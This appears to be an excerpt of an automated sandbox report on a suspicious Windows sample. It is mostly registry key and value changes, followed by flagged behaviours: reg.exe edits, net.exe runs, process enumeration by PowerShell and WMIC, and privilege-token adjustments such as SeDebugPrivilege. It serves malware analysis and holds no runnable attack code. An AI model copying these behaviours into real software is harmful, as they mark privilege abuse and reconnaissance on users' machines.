Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "DebugPlugin" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\L1036" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Voices\\Tokens\\MSTTS_V110_EnUS_ZiraM" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\de-DE\\M1031Stefan" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hedda - German (Germany)" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech Recognition Engine - es-ES Embedded DNN v11.1" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "5218064" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hortense" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 1 0008 ~ 0009 aa 000a a 000b oh 000c ax 000d b 000e d 000f eh 0010 ey 0011 f 0012 g 0013 hy 0014 uy 0015 iy 0016 k 0017 l 0018 m 0019 n 001a ng 001b nj 001c oe 001d eu 001e ow 001f p 0020 r 0021 s 0022 sh 0023 t 0024 uw 0025 v 0026 w 0027 y 0028 z 0029 zh 002a" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{E164F996-FF93-4675-BDD8-6C47AB0B86B1}" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech SW Voice Activation - Spanish (Spain)" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\it-IT\\M1040Elsa" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - Italian (Italy)" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "23" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\en-US\\VoiceActivation_HW_en-US.dat" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR es-ES Lts Lexicon" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\fr-FR\\VoiceActivation_HW_fr-FR.dat" N/A N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-870806430-2618236806-3023919190-1000\{4A6C98DF-B751-41E2-B825-2986AFC37D07} N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "002D 002D 0021 0021 0026 0026 002C 002C 002E 002E 003F 003F 005F 005F 002B 002B 002A 002A 02C9 02C9 02CA 02CA 02C7 02C7 02CB 02CB 02D9 02D9 3000 3000 3105 3105 3106 3106 3107 3107 3108 3108 3109 3109 310A 310A 310B 310B 310C 310C 310D 310D 310E 310E 310F 310F 3110 3110 3111 3111 3112 3112 3113 3113 3114 3114 3115 3115 3116 3116 3117 3117 3118 3118 3119 3119 3127 3127 3128 3128 3129 3129 311A 311A 311B 311B 311C 311C 311D 311D 311E 311E 311F 311F 3120 3120 3121 3121 3122 3122 3123 3123 3124 3124 3125 3125 3126 3126" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HW" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "MS-1033-110-WINMO-DNN" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR es-ES Locale Handler" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech SW Voice Activation - Japanese (Japan)" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{14E74C62-DC97-43B0-8F2F-581496A65D60}" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hedda" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\M1033Mark" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "5223743" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\r3082sr.lxa" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 4e003100000000006e59b55e1000486f6e6500003a0009000400efbe6e59b55e6e59c25e2e00000052500400000028000000000000000000000000000000313e7b0048006f006e006500000014000000 N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "409;9" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\lsr3082.lxa" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE/SOFTWARE\\Microsoft\\Speech_OneCore\\AudioOutput\\TokenEnums\\MMAudioOut\\" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{BAE3E62C-37D4-49AC-A6F1-0E485ECD6757}" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\c3082.fe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR ja-JP Lookup Lexicon" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\MuiCache N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - English (United States)" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Laura" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 5e003100000000006e592b5f1000484f4e4552457e310000460009000400efbe6e59b55e6e592b5f2e0000005450040000002800000000000000000000000000000055f4df0048006f006e006500520065007600650072007400000018000000 N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "40C" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Near" N/A N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
